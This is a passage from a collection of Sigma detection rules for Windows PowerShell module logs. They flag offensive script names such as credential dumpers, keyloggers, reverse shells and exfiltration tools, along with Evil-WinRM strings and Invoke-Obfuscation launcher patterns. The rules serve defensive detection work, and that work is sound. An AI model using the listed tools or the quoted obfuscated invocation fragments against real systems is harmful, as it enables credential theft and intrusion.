    "content": "title: PowerShell Decompress Commands\nid: 1ddc1472-8e52-4f7d-9f11-eab14fc171f5\nrelated:\n    - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09\n      type: derived\nstatus: test\ndescription: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/8\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains: 'Expand-Archive'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml",
    "content": "title: Malicious PowerShell Scripts - PoshModule\nid: 41025fd7-0466-4650-a813-574aaacbe7f4\nrelated:\n    - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb\n      type: similar\n    - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\n      type: obsolete\nstatus: test\ndescription: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance\nreferences:\n    - https://github.com/PowerShellMafia/PowerSploit\n    - https://github.com/NetSPI/PowerUpSQL\n    - https://github.com/CsEnox/EventViewer-UACBypass\n    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu\n    - https://github.com/nettitude/Invoke-PowerThIEf\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-23\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_generic:\n        ContextInfo|contains:\n            - 'Add-ConstrainedDelegationBackdoor.ps1'\n            - 'Add-Exfiltration.ps1'\n            - 'Add-Persistence.ps1'\n            - 'Add-RegBackdoor.ps1'\n            - 'Add-RemoteRegBackdoor.ps1'\n            - 'Add-ScrnSaveBackdoor.ps1'\n            - 'BadSuccessor.ps1'\n            - 'Check-VM.ps1'\n            - 'ConvertTo-ROT13.ps1'\n            - 'Copy-VSS.ps1'\n            - 'Create-MultipleSessions.ps1'\n            - 'DNS_TXT_Pwnage.ps1'\n            - 'dnscat2.ps1'\n            - 'Do-Exfiltration.ps1'\n            - 'DomainPasswordSpray.ps1'\n            - 'Download_Execute.ps1'\n            - 'Download-Execute-PS.ps1'\n            - 'Enabled-DuplicateToken.ps1'\n            - 'Enable-DuplicateToken.ps1'\n            - 'Execute-Command-MSSQL.ps1'\n            - 'Execute-DNSTXT-Code.ps1'\n            - 'Execute-OnTime.ps1'\n            - 'ExetoText.ps1'\n            - 'Exploit-Jboss.ps1'\n            - 'Find-AVSignature.ps1'\n            - 'Find-Fruit.ps1'\n            - 'Find-GPOLocation.ps1'\n            - 'Find-TrustedDocuments.ps1'\n            - 'FireBuster.ps1'\n            - 'FireListener.ps1'\n            - 'Get-ApplicationHost.ps1'\n            - 'Get-ChromeDump.ps1'\n            - 'Get-ClipboardContents.ps1'\n            - 'Get-ComputerDetail.ps1'\n            - 'Get-FoxDump.ps1'\n            - 'Get-GPPAutologon.ps1'\n            - 'Get-GPPPassword.ps1'\n            - 'Get-IndexedItem.ps1'\n            - 'Get-Keystrokes.ps1'\n            - 'Get-LSASecret.ps1'\n            - 'Get-MicrophoneAudio.ps1'\n            - 'Get-PassHashes.ps1'\n            - 'Get-PassHints.ps1'\n            - 'Get-RegAlwaysInstallElevated.ps1'\n            - 'Get-RegAutoLogon.ps1'\n            - 'Get-RickAstley.ps1'\n            - 'Get-Screenshot.ps1'\n            - 'Get-SecurityPackages.ps1'\n            - 'Get-ServiceFilePermission.ps1'\n            - 'Get-ServicePermission.ps1'\n            - 'Get-ServiceUnquoted.ps1'\n            - 'Get-SiteListPassword.ps1'\n            - 'Get-System.ps1'\n            - 'Get-TimedScreenshot.ps1'\n            - 'Get-UnattendedInstallFile.ps1'\n            - 'Get-Unconstrained.ps1'\n            - 'Get-USBKeystrokes.ps1'\n            - 'Get-VaultCredential.ps1'\n            - 'Get-VulnAutoRun.ps1'\n            - 'Get-VulnSchTask.ps1'\n            - 'Get-WebConfig.ps1'\n            - 'Get-WebCredentials.ps1'\n            - 'Get-WLAN-Keys.ps1'\n            - 'Gupt-Backdoor.ps1'\n            - 'HTTP-Backdoor.ps1'\n            - 'HTTP-Login.ps1'\n            - 'Install-ServiceBinary.ps1'\n            - 'Install-SSP.ps1'\n            - 'Invoke-ACLScanner.ps1'\n            - 'Invoke-ADSBackdoor.ps1'\n            - 'Invoke-AmsiBypass.ps1'\n            - 'Invoke-ARPScan.ps1'\n            - 'Invoke-BackdoorLNK.ps1'\n            - 'Invoke-BadPotato.ps1'\n            - 'Invoke-BetterSafetyKatz.ps1'\n            - 'Invoke-BruteForce.ps1'\n            - 'Invoke-BypassUAC.ps1'\n            - 'Invoke-Carbuncle.ps1'\n            - 'Invoke-Certify.ps1'\n            - 'Invoke-ConPtyShell.ps1'\n            - 'Invoke-CredentialInjection.ps1'\n            - 'Invoke-CredentialsPhish.ps1'\n            - 'Invoke-DAFT.ps1'\n            - 'Invoke-DCSync.ps1'\n            - 'Invoke-Decode.ps1'\n            - 'Invoke-DinvokeKatz.ps1'\n            - 'Invoke-DllInjection.ps1'\n            - 'Invoke-DNSExfiltrator.ps1'\n            - 'Invoke-DowngradeAccount.ps1'\n            - 'Invoke-EgressCheck.ps1'\n            - 'Invoke-Encode.ps1'\n            - 'Invoke-EventViewer.ps1'\n            - 'Invoke-Eyewitness.ps1'\n            - 'Invoke-FakeLogonScreen.ps1'\n            - 'Invoke-Farmer.ps1'\n            - 'Invoke-Get-RBCD-Threaded.ps1'\n            - 'Invoke-Gopher.ps1'\n            - 'Invoke-Grouper2.ps1'\n            - 'Invoke-Grouper3.ps1'\n            - 'Invoke-HandleKatz.ps1'\n            - 'Invoke-Interceptor.ps1'\n            - 'Invoke-Internalmonologue.ps1'\n            - 'Invoke-Inveigh.ps1'\n            - 'Invoke-InveighRelay.ps1'\n            - 'Invoke-JSRatRegsvr.ps1'\n            - 'Invoke-JSRatRundll.ps1'\n            - 'Invoke-KrbRelay.ps1'\n            - 'Invoke-KrbRelayUp.ps1'\n            - 'Invoke-LdapSignCheck.ps1'\n            - 'Invoke-Lockless.ps1'\n            - 'Invoke-MalSCCM.ps1'\n            - 'Invoke-Mimikatz.ps1'\n            - 'Invoke-MimikatzWDigestDowngrade.ps1'\n            - 'Invoke-Mimikittenz.ps1'\n            - 'Invoke-MITM6.ps1'\n            - 'Invoke-NanoDump.ps1'\n            - 'Invoke-NetRipper.ps1'\n            - 'Invoke-NetworkRelay.ps1'\n            - 'Invoke-NinjaCopy.ps1'\n            - 'Invoke-OxidResolver.ps1'\n            - 'Invoke-P0wnedshell.ps1'\n            - 'Invoke-P0wnedshellx86.ps1'\n            - 'Invoke-Paranoia.ps1'\n            - 'Invoke-PortScan.ps1'\n            - 'Invoke-PoshRatHttp.ps1'\n            - 'Invoke-PoshRatHttps.ps1'\n            - 'Invoke-PostExfil.ps1'\n            - 'Invoke-PowerDump.ps1'\n            - 'Invoke-PowerDPAPI.ps1'\n            - 'Invoke-PowerShellIcmp.ps1'\n            - 'Invoke-PowerShellTCP.ps1'\n            - 'Invoke-PowerShellTcpOneLine.ps1'\n            - 'Invoke-PowerShellTcpOneLineBind.ps1'\n            - 'Invoke-PowerShellUdp.ps1'\n            - 'Invoke-PowerShellUdpOneLine.ps1'\n            - 'Invoke-PowerShellWMI.ps1'\n            - 'Invoke-PowerThIEf.ps1'\n            - 'Invoke-PPLDump.ps1'\n            - 'Invoke-Prasadhak.ps1'\n            - 'Invoke-PsExec.ps1'\n            - 'Invoke-PsGcat.ps1'\n            - 'Invoke-PsGcatAgent.ps1'\n            - 'Invoke-PSInject.ps1'\n            - 'Invoke-PsUaCme.ps1'\n            - 'Invoke-ReflectivePEInjection.ps1'\n            - 'Invoke-ReverseDNSLookup.ps1'\n            - 'Invoke-Rubeus.ps1'\n            - 'Invoke-RunAs.ps1'\n            - 'Invoke-SafetyKatz.ps1'\n            - 'Invoke-SauronEye.ps1'\n            - 'Invoke-SCShell.ps1'\n            - 'Invoke-Seatbelt.ps1'\n            - 'Invoke-ServiceAbuse.ps1'\n            - 'Invoke-SessionGopher.ps1'\n            - 'Invoke-ShellCode.ps1'\n            - 'Invoke-SMBScanner.ps1'\n            - 'Invoke-Snaffler.ps1'\n            - 'Invoke-Spoolsample.ps1'\n            - 'Invoke-SSHCommand.ps1'\n            - 'Invoke-SSIDExfil.ps1'\n            - 'Invoke-StandIn.ps1'\n            - 'Invoke-StickyNotesExtract.ps1'\n            - 'Invoke-Tater.ps1'\n            - 'Invoke-Thunderfox.ps1'\n            - 'Invoke-ThunderStruck.ps1'\n            - 'Invoke-TokenManipulation.ps1'\n            - 'Invoke-Tokenvator.ps1'\n            - 'Invoke-TotalExec.ps1'\n            - 'Invoke-UrbanBishop.ps1'\n            - 'Invoke-UserHunter.ps1'\n            - 'Invoke-VoiceTroll.ps1'\n            - 'Invoke-Whisker.ps1'\n            - 'Invoke-WinEnum.ps1'\n            - 'Invoke-winPEAS.ps1'\n            - 'Invoke-WireTap.ps1'\n            - 'Invoke-WmiCommand.ps1'\n            - 'Invoke-WScriptBypassUAC.ps1'\n            - 'Invoke-Zerologon.ps1'\n            - 'Keylogger.ps1'\n            - 'MailRaider.ps1'\n            - 'New-HoneyHash.ps1'\n            - 'OfficeMemScraper.ps1'\n            - 'Offline_Winpwn.ps1'\n            - 'Out-CHM.ps1'\n            - 'Out-DnsTxt.ps1'\n            - 'Out-Excel.ps1'\n            - 'Out-HTA.ps1'\n            - 'Out-Java.ps1'\n            - 'Out-JS.ps1'\n            - 'Out-Minidump.ps1'\n            - 'Out-RundllCommand.ps1'\n            - 'Out-SCF.ps1'\n            - 'Out-SCT.ps1'\n            - 'Out-Shortcut.ps1'\n            - 'Out-WebQuery.ps1'\n            - 'Out-Word.ps1'\n            - 'Parse_Keys.ps1'\n            - 'Port-Scan.ps1'\n            - 'PowerBreach.ps1'\n            - 'powercat.ps1'\n            - 'PowerRunAsSystem.psm1'\n            - 'PowerSharpPack.ps1'\n            - 'PowerUp.ps1'\n            - 'PowerUpSQL.ps1'\n            - 'PowerView.ps1'\n            - 'PSAsyncShell.ps1'\n            - 'RemoteHashRetrieval.ps1'\n            - 'Remove-Persistence.ps1'\n            - 'Remove-PoshRat.ps1'\n            - 'Remove-Update.ps1'\n            - 'Run-EXEonRemote.ps1'\n            - 'Schtasks-Backdoor.ps1'\n            - 'Set-DCShadowPermissions.ps1'\n            - 'Set-MacAttribute.ps1'\n            - 'Set-RemotePSRemoting.ps1'\n            - 'Set-RemoteWMI.ps1'\n            - 'Set-Wallpaper.ps1'\n            - 'Show-TargetScreen.ps1'\n            - 'Speak.ps1'\n            - 'Start-CaptureServer.ps1'\n            - 'Start-WebcamRecorder.ps1'\n            - 'StringToBase64.ps1'\n            - 'TexttoExe.ps1'\n            - 'Veeam-Get-Creds.ps1'\n            - 'VolumeShadowCopyTools.ps1'\n            - 'WinPwn.ps1'\n            - 'WSUSpendu.ps1'\n    selection_invoke_sharp:\n        ContextInfo|contains|all:\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - '.ps1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml",
    "content": "title: Suspicious Get-ADDBAccount Usage\nid: b140afd9-474b-4072-958e-2ebb435abd68\nstatus: test\ndescription: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers\nreferences:\n    - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-16\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains|all:\n            - 'Get-ADDBAccount'\n            - 'BootKey '\n            - 'DatabasePath '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml",
    "content": "title: PowerShell Get Clipboard\nid: 4cbd4f12-2e22-43e3-882f-bff3247ffb78\nstatus: test\ndescription: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/16\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-01-04\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains: 'Get-Clipboard'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_hktl_evil_winrm_execution.yml",
    "content": "title: HackTool - Evil-WinRm Execution - PowerShell Module\nid: 9fe55ea2-4cd6-4491-8a54-dd6871651b51\nstatus: test\ndescription: |\n    Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.\nreferences:\n    - https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb\n    - https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-25\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: windows\n    category: ps_module\ndetection:\n    selection_wsm:\n        ContextInfo|contains:\n            - ':\\Windows\\System32\\wsmprovhost.exe'\n            - ':\\Windows\\SysWOW64\\wsmprovhost.exe'\n    selection_payload_1:\n        Payload|contains:\n            - value=\"(get-location).path # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L592\n            - value=\"(get-item*).length # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L490\n            - 'Invoke-Binary ' # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L740\n            - Donut-Loader -process_id*-donutfile # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L761\n            - Bypass-4MSI\n            - IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($a))).replace('???','')\n    selection_payload_2:\n        Payload|contains|all:\n            - $servicios = Get-ItemProperty \"registry::HKLM\\System\\CurrentControlSet\\Services\\\"\n            - Where-Object {$_.imagepath -notmatch \"system\" -and $_.imagepath -ne $null } | Select-Object pschildname,imagepath\n    selection_payload_3:\n        Payload|contains|all:\n            - $a +=  \\\"$($_.FullName.Replace('\\\\','/'))/\\\"}else{  $a += \\\"$($_.FullName.Replace('\\\\', '/'))\\\" } # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L1001\n            - $a=@();$\n    condition: selection_wsm and 1 of selection_payload_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - PowerShell Module\nid: a136cde0-61ad-4a61-9b82-8dc490e60dd2\nrelated:\n    - id: 73e67340-0d25-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: 'cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module\nid: 2f211361-7dce-442d-b78a-c04039677378\nrelated:\n    - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7\n      type: derived\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019-11-08\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_payload:\n        - Payload|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - Payload|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - Payload|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - Payload|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - Payload|re: '\\*mdr\\*\\W\\s*\\)\\.Name'\n        - Payload|re: '\\$VerbosePreference\\.ToString\\('\n        - Payload|re: '\\[String\\]\\s*\\$VerbosePreference'\n    condition: selection_payload\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - PowerShell Module\nid: 9ac8b09b-45de-4a07-9da1-0de8c09304a3\nrelated:\n    - id: 779c8c12-0eb1-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: 'cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - PowerShell Module\nid: 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e\nrelated:\n    - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: 'cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module\nid: 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1\nrelated:\n    - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n        Payload|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n        Payload|endswith: 'readtoend'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module\nid: a23791fe-8846-485a-b16b-ca691e1b03d4\nrelated:\n    - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml",
    "content": "title: Invoke-Obfuscation Via Stdin - PowerShell Module\nid: c72aca44-8d52-45ad-8f81-f96c4d3c755e\nrelated:\n    - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - PowerShell Module\nid: ebdf49d8-b89c-46c9-8fdf-2c308406f6bd\nrelated:\n    - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: '(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - PowerShell Module\nid: 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb\nrelated:\n    - id: e55a5195-4724-480e-a77e-3ebe64bd3759\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-08\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32 - PowerShell Module\nid: 88a22f69-62f9-4b8a-aa00-6b0212f2f05a\nrelated:\n    - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nikita Nazarov, oscd.community\ndate: 2019-10-08\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        Payload|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml",
